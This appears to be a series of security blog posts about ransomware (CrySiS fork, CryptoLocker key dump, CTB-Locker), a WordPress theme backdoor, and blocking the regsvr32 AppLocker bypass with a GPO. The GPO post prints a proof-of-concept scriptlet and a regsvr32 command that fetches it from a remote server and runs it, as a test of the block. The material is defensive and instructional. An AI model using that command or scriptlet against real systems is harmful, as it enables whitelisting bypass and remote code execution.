CrySiS Reborn, Not Decryptable: [stopper@india.com].wallet

Break-fix call on a CrySiS Ransomware infection.  It’s actually not CrySiS, but a fork of it, which is not decryptable at this time.  CrySiS shut down its operation a month or so ago and dumped the master encryption key so victims could decrypt their files.  Not so much with this variant.
After infection, it drops a JPEG file in the user’s folder C:\Users\Victim\INFORMATION HOoW TO DECRYYPT FILES.jpg.
It encrypts files and renames them with .[stopper@india.com].wallet
It drops a file on the desktop named STOPPER.txt:

Attentiion!!!
All your filess are encrypted!
To decrypt your files, please contact us by email:stopper@india.com

The method of infection was from unauthorized access (brute-force) RDP connection.
It also drops AnonCrpt.exe (274 KB) on the desktop; a quick VirusTotal analysis shows the results below:

VirusTotal detection results from AnonCrpt.exe

As mentioned earlier, there is not a way to decrypt this currently.
Stay safe.

Part 1: Analysis of a WordPress Malware

I had some time at lunch to kill, so I decided to see how malware techniques were improving in the land of WordPress and free premium theme download sites.

Enter the Darknet.

A simple Google search got me a theme ZIP file pretty quickly.  Now, it was time to see what malicious happenings this thing would cause.
Unpacked, here’s the structure of the ZIP file.

.
├── functions.php
├── home.php
├── images
│   ├── arrow.png
│   ├── bg-pattern.png
│   ├── bg.png
│   ├── blockquote.png
│   ├── blue
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── favicon.ico
│   ├── footer-twitter.png
│   ├── footer-widgets.png
│   ├── gradient.png
│   ├── green
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── icon-dot.png
│   ├── list-after-post.png
│   ├── list.png
│   ├── logo.png
│   ├── logo-texture.png
│   ├── logo-vert-left.png
│   ├── logo-vert-right.png
│   ├── red
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── rss.png
│   ├── social-icons.png
│   └── twitter-nav.png
├── page_landing.php
├── page_landing2.php
├── README.txt
├── screenshot.png
└── style.css

Right off the bat, page_landing2.php sticks out to me. Let’s take a look.



Oh. Would you look at that fun. Time to see what this is doing.
First, I don’t like trying to read the garbled code, so I “prettify” it.


Ok, so let’s decode the above to make it readable.

There are a few interesting pieces here.



These interest me because they are making a call to a website to get additional payload/scripts. Let’s see what they are. =)

The first one, pastebin link, shows me this garbled shit. What I really care about is the compressed base64 at the end.


So, now I look to deobfuscating the compressed/base64 garbage… Here’s part of the file; my screen capture died when my computer automatically locked. [FIXME]

NOTE: Click on the image for a higher resolution. It’s like 62k pixels tall, lol.
 
What I’m interested in is the top of this file.


So again, uncompressing the base64 encoding of that gives me the following file.


Going back for a minute to the previous garbled output: the $plsym variable, which holds the compressed/base64 data, is decompressed, decoded, and saved as a Perl file.
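Doing this by hand for every layer gets old fast. As an added example (not code from the post), here is a PowerShell layer peeler for the kind of compressed base64 blob described above. The post does not say which compression PHP function produced the blob, so the script assumes one of gzinflate (raw DEFLATE), gzuncompress (zlib) or gzdecode (gzip) and tries each in turn; the function names and the regular expression that pulls out nested base64_decode() arguments are my own.

```powershell
# Added example, not code from the post. Peels nested base64 + compression layers of the
# kind seen in page_landing2.php and the pastebin payload. The compression scheme is an
# assumption: PHP's gzinflate() emits raw DEFLATE, gzuncompress() zlib, gzdecode() gzip.
function Expand-Layer {
    param([Parameter(Mandatory)][byte[]]$Bytes)

    # Order the attempts by magic bytes; raw DEFLATE has none, so it is the fallback.
    $candidates = @()
    if ($Bytes.Length -ge 2 -and $Bytes[0] -eq 0x1F -and $Bytes[1] -eq 0x8B) {
        $candidates += @{ Name = 'gzip'; Skip = 0; Gzip = $true }
    } elseif ($Bytes.Length -ge 2 -and $Bytes[0] -eq 0x78) {
        $candidates += @{ Name = 'zlib'; Skip = 2; Gzip = $false }   # skip the 2-byte zlib header
    }
    $candidates += @{ Name = 'deflate'; Skip = 0; Gzip = $false }

    $mode = [System.IO.Compression.CompressionMode]::Decompress
    foreach ($c in $candidates) {
        try {
            $in = [System.IO.MemoryStream]::new($Bytes)
            $in.Position = $c.Skip
            $stream = if ($c.Gzip) { [System.IO.Compression.GZipStream]::new($in, $mode) } else { [System.IO.Compression.DeflateStream]::new($in, $mode) }
            $out = [System.IO.MemoryStream]::new()
            $stream.CopyTo($out)
            $stream.Dispose()
            if ($out.Length -gt 0) {
                return [pscustomobject]@{ Scheme = $c.Name; Bytes = $out.ToArray() }
            }
        } catch {
            # wrong scheme for this blob; try the next candidate
        }
    }
    return $null
}

function Expand-ObfuscatedBlob {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Base64,   # the blob copied from the source, whitespace allowed
        [int]$MaxLayers = 10                     # stop runaway nesting
    )
    $bytes = [Convert]::FromBase64String(($Base64 -replace '\s', ''))
    for ($layer = 1; $layer -le $MaxLayers; $layer++) {
        $r = Expand-Layer -Bytes $bytes
        if (-not $r) { break }                   # not compressed: we have reached plaintext
        $text = [System.Text.Encoding]::UTF8.GetString($r.Bytes)
        Write-Verbose ("layer {0}: {1}, {2} bytes" -f $layer, $r.Scheme, $r.Bytes.Length)
        # Typical nesting is eval(gzinflate(base64_decode('...'))); pull out the inner blob and repeat.
        $m = [regex]::Match($text, 'base64_decode\(\s*[''"]([A-Za-z0-9+/=\s]+)[''"]')
        if (-not $m.Success) { return $text }
        $bytes = [Convert]::FromBase64String(($m.Groups[1].Value -replace '\s', ''))
    }
    return [System.Text.Encoding]::UTF8.GetString($bytes)
}

# Usage: paste the blob into blob.txt, then
#   Expand-ObfuscatedBlob -Base64 (Get-Content .\blob.txt -Raw) -Verbose | Set-Content .\decoded.txt
```

Run it with -Verbose to see which scheme each layer used and how large it was; the loop stops as soon as a layer is neither compressed nor wraps another base64_decode() call, which is the point where the real code (here, the Perl file) appears.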


At this point, I have everything I need to begin to follow this even deeper into the dark underworld. There are a few domains (which I didn’t highlight in this article, but you can find them in the screenshots) and some passwords.

Stay tuned… in the next update, I show you what happens when I infiltrate their command servers. Much fun!

CryptoLocker Database Search

I found the database dump of the CryptoLocker release from May 30, 2015 by the ransomware’s author.  I decided to put it into a database and make a lame front-end for it that can be queried by either the bitcoin address or the public RSA key from the infected computer.
Hope it helps someone out there.
https://techish.net/locker/

Hi,
I am the author of the Locker ransomware and I’m very sorry about what has happened. It was never my
intention to release this.
I uploaded the database to mega.co.nz containing bitcoin address, public key, private key as CSV.
This is a dump of the complete database and most of the keys weren’t even used.
All distribution of new keys has been stopped.
https://mega.co.nz/#!W85whbSb!kAb-5VS1Gf20zYziUOgMOaYWDsI87o4QHJBqJiOW6Z4
Automatic decryption will start on 2nd of June at midnight.
@devs, as you might be aware the private key is used in the RSACryptoServiceProvider class .net and
files are encrypted with AES-256 bit using the RijndaelManaged class.
This is the structure of the encrypted files:
– 32 bit integer, header length
– byte array, header (length is previous int)
*decrypt byte array using RSA & private key.
Decrypted byte array contains:
– 32 bit integer, IV length
– byte array, IV (length is in previous int)
– 32 bit integer, key length
– byte array, Key (length is in previous int)
– rest of the data is the actual file which can be decrypted using RijndaelManaged and the IV and Key
Again sorry for all the trouble.
Poka BrightMinds
~ V
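The layout in that message is enough to write a recovery routine. The following PowerShell is an added example, not code from the post or from the ransomware author; it uses the two .NET classes the message names. It assumes details the message does not state: the 32-bit lengths are little-endian (as BinaryWriter emits them), the header was wrapped with RSACryptoServiceProvider.Encrypt(data, false) (PKCS#1 v1.5 padding), and RijndaelManaged ran with its defaults (CBC mode, PKCS7 padding, 128-bit block). New-LockerSample is a constructed test fixture that builds a file in this layout with a throwaway key pair so the decryptor can be exercised without a victim’s file.

```powershell
# Added example, not the post's or the ransomware author's code.
# Assumptions not stated in the message: little-endian int32 lengths, PKCS#1 v1.5 RSA
# padding (Encrypt(..., $false)), RijndaelManaged defaults (CBC, PKCS7, 128-bit block).
function Unprotect-LockerFile {
    param(
        [Parameter(Mandatory)][byte[]]$Data,
        [Parameter(Mandatory)][System.Security.Cryptography.RSACryptoServiceProvider]$PrivateKey
    )
    # 1) int32 header length, then the RSA-encrypted header
    $headerLen = [System.BitConverter]::ToInt32($Data, 0)
    if ($headerLen -le 0 -or (4 + $headerLen) -gt $Data.Length) { throw "Malformed header length: $headerLen" }
    $encHeader = [byte[]]::new($headerLen)
    [Array]::Copy($Data, 4, $encHeader, 0, $headerLen)
    $header = $PrivateKey.Decrypt($encHeader, $false)

    # 2) decrypted header: int32 IV length, IV, int32 key length, key
    $pos = 0
    $ivLen  = [System.BitConverter]::ToInt32($header, $pos); $pos += 4
    $iv     = [byte[]]$header[$pos..($pos + $ivLen - 1)];    $pos += $ivLen
    $keyLen = [System.BitConverter]::ToInt32($header, $pos); $pos += 4
    $key    = [byte[]]$header[$pos..($pos + $keyLen - 1)]
    if ($keyLen -ne 32) { throw "Expected a 256-bit key, found $($keyLen * 8) bits" }

    # 3) everything after the header is the Rijndael/AES-256 ciphertext of the original file
    $aes = New-Object System.Security.Cryptography.RijndaelManaged
    $aes.Key = $key
    $aes.IV  = $iv
    $bodyOffset = 4 + $headerLen
    return $aes.CreateDecryptor().TransformFinalBlock($Data, $bodyOffset, $Data.Length - $bodyOffset)
}

# Constructed test fixture: builds a file in the same layout with a throwaway key pair,
# so the decryptor can be tried without a victim's file.
function New-LockerSample {
    param(
        [Parameter(Mandatory)][byte[]]$Plaintext,
        [Parameter(Mandatory)][System.Security.Cryptography.RSACryptoServiceProvider]$PublicKey
    )
    $aes = New-Object System.Security.Cryptography.RijndaelManaged
    $aes.KeySize = 256
    $aes.GenerateKey()
    $aes.GenerateIV()
    $body = $aes.CreateEncryptor().TransformFinalBlock($Plaintext, 0, $Plaintext.Length)
    $header = [System.BitConverter]::GetBytes([int]$aes.IV.Length) + $aes.IV +
              [System.BitConverter]::GetBytes([int]$aes.Key.Length) + $aes.Key
    $encHeader = $PublicKey.Encrypt([byte[]]$header, $false)
    return [byte[]]([System.BitConverter]::GetBytes([int]$encHeader.Length) + $encHeader + $body)
}

# Round trip: in real recovery $rsa would be loaded from the leaked private key instead.
$rsa       = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048
$original  = [System.Text.Encoding]::UTF8.GetBytes('constructed sample: contents of quarterly-report.docx')
$sample    = New-LockerSample -Plaintext $original -PublicKey $rsa
$recovered = Unprotect-LockerFile -Data $sample -PrivateKey $rsa
[System.Text.Encoding]::UTF8.GetString($recovered)
```

For real files, read the victim’s file with [System.IO.File]::ReadAllBytes, load the matching private key from the dump into an RSACryptoServiceProvider (the dump’s key format is not described in the post, so that step is yours to work out), and write the returned bytes to the original filename. The two length checks matter: a wrong key produces a padding exception at the RSA step rather than silently feeding garbage into AES.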

GPO to block regsvr32 AppLocker Bypass Vulnerability

A recently discovered method of bypassing AppLocker by using regsvr32.exe poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions).  To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall.  Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO, named it Firewall: Block regsvr32, and then edited it.
Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security
Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard

Choose Program as the type of rule to create and click Next >

Use C:\windows\system32\regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose.

Choose Block as the action and click Next >

Apply it to all network locations.

Give the rule a name and possibly a description.

The block rule is now listed in Inbound Rules.

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.
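For a domain with many GPOs it is easier to script the rules than to click through the wizard twice. The following PowerShell is an added example, not from the post; it uses the NetSecurity cmdlets available on Windows 8 / Server 2012 and later, writes into the GPO named in the post via -PolicyStore (the domain name is a placeholder), and also covers the 32-bit copy of regsvr32.exe under SysWOW64 on 64-bit Windows, which a rule on the System32 path alone does not block.

```powershell
# Added example, not from the post: the same pair of program-block rules the wizards create,
# scripted into the GPO. Run from a machine with the GroupPolicy and NetSecurity modules.
$domain  = 'corp.example'                     # placeholder: your AD DNS domain name
$gpoName = 'Firewall: Block regsvr32'         # GPO name used in the post
$store   = "$domain\$gpoName"                 # omit -PolicyStore below to write the local policy instead

# %SystemRoot% is expanded on each client by the firewall, so the rule works regardless of
# the Windows install path. On 64-bit Windows there are two copies of regsvr32.exe.
$binaries = @(
    '%SystemRoot%\System32\regsvr32.exe',
    '%SystemRoot%\SysWOW64\regsvr32.exe'
)

foreach ($exe in $binaries) {
    $folder = Split-Path (Split-Path $exe -Parent) -Leaf     # System32 or SysWOW64
    foreach ($dir in 'Inbound', 'Outbound') {
        New-NetFirewallRule -PolicyStore $store `
            -DisplayName "Block regsvr32 ($dir, $folder)" `
            -Description 'Denies network access to regsvr32.exe (scriptlet-based AppLocker bypass mitigation)' `
            -Direction $dir -Program $exe -Action Block -Profile Any -Enabled True | Out-Null
    }
}

# Verify what landed in the GPO before linking it
Get-NetFirewallRule -PolicyStore $store -DisplayName 'Block regsvr32*' |
    Format-Table DisplayName, Direction, Action, Enabled
```

Four rules result (two binaries, two directions). Link the GPO as usual afterwards; the wizard-created rules from the steps above and these scripted ones are interchangeable, so pick one method per GPO to avoid duplicates.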

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate Group Policy refresh.
I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file yourself (the extension doesn’t have to be .SCT; it can be anything…).
backdoor.sct

<?XML version="1.0"?>
<scriptlet>
<registration
 progid="Empire"
 classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).

Crypto Ransomware CTB-Locker (Critroni.A)

Move over CryptoLocker, there’s a newer and meaner kid on the block.
CTB-Locker, or Curve-Tor-Bitcoin Locker, makes use of the Tor network [1] to maintain anonymity, making it more difficult to trace the culprits; detected infections have been on the rise since June of this year.
This strain of ransomware also compresses the files it encrypts, using Zlib, and employs ECDH (Elliptic Curve Diffie-Hellman) [2] encryption, another unusual feature. The ransomware’s author insists that decryption of files without payment is impossible due to RSA-3072 encryption.
Like CryptoLocker, CTB-Locker/Critroni generates a public and private key pair for every infected system. The public key is stored on the infected computer and given to the victim, who is then asked to pay a ransom in Bitcoin in order to recover the files.
The private key, which is used to decrypt the files, is stored on a remote command-and-control server that, in the case of Critroni, can only be accessed over the Tor anonymity network. This is a precaution that the creator has taken in order to make it difficult for law enforcement agencies or security researchers to identify and shut down the server.
Critroni was designed to complete the file encryption operation locally before connecting to the command-and-control server. This also makes it hard for network security products to detect it early and block it by analyzing traffic.
Again, similar to CryptoLocker, there is a 72 hour window of “opportunity” to pay up and get a decryption key.
A more in-depth analysis and walkthrough of this new crypto ransomware can be viewed on the blog of Kafeine, a French security researcher.
Touted as the CryptoLocker replacement, this is just another reminder to make sure you have a good backup strategy.

[1] Tor is free software and an open network that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security.
[2] Elliptic curve Diffie–Hellman (ECDH) is an anonymous key agreement protocol that allows two parties, each having an elliptic curve public–private key pair, to establish a shared secret over an insecure channel. This shared secret may be used directly as a key or, better yet, to derive another key which can then be used to encrypt subsequent communications with a symmetric cipher. It is a variant of the Diffie–Hellman protocol using elliptic curve cryptography.